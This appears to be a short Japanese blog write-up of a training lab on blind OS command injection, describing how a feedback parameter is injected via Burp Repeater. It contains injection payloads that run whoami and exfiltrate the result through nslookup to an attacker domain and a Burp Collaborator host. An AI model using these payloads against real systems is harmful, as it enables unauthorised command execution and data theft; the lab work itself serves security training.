Hello there, ('ω')ノ
帯域外チャネルは、挿入されたコマンドから出力を抽出する簡単な方法を提供して。
whoamiで、コマンドの結果を含む攻撃者のドメインでDNS lookupが発生して。
例えば、下記のように。
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
まずは、フィードバックを送信して。

該当するリクエストをリピータへ。

コラボレータのペイロードをコピーして。

下記をパラメータに追加してSendすると。
||nslookup+`whoami`.qqkzubmlegqqe32esgz5c089x03qrf.burpcollaborator.net||

ペイロードの結果として。
アプリケーションによって開始されたいくつかのDNS相互作用が表示されて。
コマンドからの出力がインタラクションのサブドメイン(下のエリア)に表示されて。
検索された完全なドメイン名は、Descriptionタブに表示されて。

検索されたドメイン名をDNS queryタブからコピーして。
peter-I4mu2s

入力すると。

クリアできた。

Best regards, (^^ゞ